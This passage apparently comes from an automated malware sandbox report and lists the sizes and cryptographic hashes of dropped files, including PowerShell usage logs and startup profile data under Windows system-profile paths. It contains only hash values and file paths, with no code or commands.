MD591ec853e75e7e069149c97d2c126ffb6
SHA11aff8aa2940f85e8e87fa16b130c23feaede946d
SHA256aa26cfbb528cd91c2b29827df28911115e377de9bd2c3dfe2f554f905c1bb826
SHA51202539134dc96cee622f4c9551a3a2e8fbe4fd2f7f02eb0caa018cea3f6246624dacfe299dd0475f0c549314c597c2fb01ec1353ccb7cf51101fa9545fc4bdeb2
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
Filesize
198KB
MD5a64a886a695ed5fb9273e73241fec2f7
SHA1363244ca05027c5beb938562df5b525a2428b405
SHA256563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize18KB
MD55618678c5a227496563c9a85e751903d
SHA1d44ce45607986d093ee5fca2b88b8c101a1f87db
SHA25687152f08eeb0c2df8e8ba26a21702b331ca1058fb134da0ef966366cd22298b4
SHA512a78e5d5514cbe44d6265037716b21d49e17e2de5a08812ddf96006c3be578f2ab71d8e2b4ca7b773192710f33c8c2b70afa8dece2909a99476cfb2dd0f353239
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize18KB
MD50b2918d3e54ba55c5275d9edf7f00940
SHA13847c289d3f9be9d67ac5572fc768ba653d6dcc0
SHA256a1f0cba67fd7c6bddbefd345342e13d9523ca4bdb70cfa039ba2f60114e0f2a8
SHA5127482a1005ae49d9743975f841db2b3e223b981b61c469b95bd361b3ff125548fb43656b3378fb5496fa93153f9e0cde9bd1b8d027c3024ab74339dc61caa67a9
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize18KB
MD50cf534804177ec430199c74eb702adca
SHA1fe292592692f05da8d0f06e35ac661de2ccae3e5
SHA25629399a32743f0e3df131dfcd35aed6b53d1bb452f24b20b7aecb6978ef1bb706
SHA51271d6657be6e8ecdb7f3b9c74006079925678ec798602a5f1ef9e634b3f2f5c68e20b43e7da789617110ae87e95a72dfd412b9a6a81c136336dc16d9586c03e8d
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize18KB
MD5c147dda48876d4f73dd8839f633ab809
SHA1782acec37a125cdd7cccc67d70ba3a2d28ed2af5
SHA25669321e293f99177a9cf994bd381a3d4dee68129d04b067e1320932819844ae9f
SHA512f569321a6aecf8411e451d3719b90a65c3cdd0f3188d4eac3713b2f1ac89d7727802eaa85d1b873f2eb180ff03604e9a47690db081c8eb355dc1a7fc63e97495
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize18KB
MD5a369d88934fb204e69a31f01515888e5
SHA18417c828d9bb5048fc4f633ef1f5f7a294494fbd
SHA256e368dabd91eb11e13de27f5007d76f750fa358d7ed932331bec2c3d2ff2cf22f
SHA512131af2ebaad941375ed33e069e664c733f3a31851f3d35a4b56cf8888d2fca930b4cf2087c0d8097c5039000b7f65856e4555c259e6db5819ce0ac58f63b7c4f
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
Filesize
4.1MB
MD5451af59f1dc7bf09eaad8c27aab0a8fe
SHA1a1e5d215d9e45937697d72e14d33476c6af4705c
SHA2562273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA51239b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d
-
Filesize
4.1MB
MD5451af59f1dc7bf09eaad8c27aab0a8fe
SHA1a1e5d215d9e45937697d72e14d33476c6af4705c
SHA2562273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA51239b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD5811d351aabd7b708fef7683cf5e29e15
SHA106fd89e5a575f45d411cf4b3a2d277e642e73dbb
SHA2560915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18
SHA512702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5302a7c179ef577c237c5418fb770fd27
SHA1343ef00d1357a8d2ff6e1143541a8a29435ed30c
SHA2569e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f
SHA512f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5631f4b3792b263fdda6b265e93be4747
SHA11d6916097d419198bfdf78530d59d0d9f3e12d45
SHA2564e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976
SHA512e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5ceae6d6d696d08506f3edd910609fd96
SHA135be7b13a8068feb82cf95062a7be4b4f559ff3a
SHA256f5105692d9f5cbfd2500fdf9c50ecfbcf6fd6afc8045af2bb12f2b023bcca9e5
SHA512fa4e6e6d60ae60a4bec8002914379799bc066ec574e55414272872ddeb6d7760f81d5d874aeaec4aa475854e16e785ad7e2d0afa88ebf3f33a07ce0d7ac37681
-
Filesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
Filesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
Filesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec